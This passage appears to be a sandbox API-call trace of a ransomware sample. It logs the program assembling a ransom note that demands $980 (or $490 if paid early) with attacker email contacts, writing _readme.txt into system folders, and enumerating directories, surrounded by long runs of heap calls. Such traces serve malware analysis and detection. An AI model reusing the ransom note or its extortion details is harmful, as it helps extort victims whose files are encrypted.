$980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.750] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.751] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.751] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.751] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.751] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.751] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.751] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.751] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.751] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.752] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.752] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.752] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.753] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.753] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.754] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.754] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.755] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.755] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.755] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.755] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.755] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.755] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.755] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.755] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.755] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.755] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.755] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.755] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.755] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.755] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.755] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.755] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.755] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.755] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.755] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.755] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.755] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.755] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.755] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.755] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.755] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.755] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.755] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.755] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.755] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.755] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.755] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.755] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.755] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.755] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.755] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.755] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.755] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.756] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.756] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.756] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.756] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.756] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.756] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.756] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.756] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.756] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.756] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.756] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.756] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.756] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.756] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.756] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.756] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.756] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.756] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.756] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.756] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.756] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.756] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.756] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.756] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.756] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.756] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.756] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.756] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | 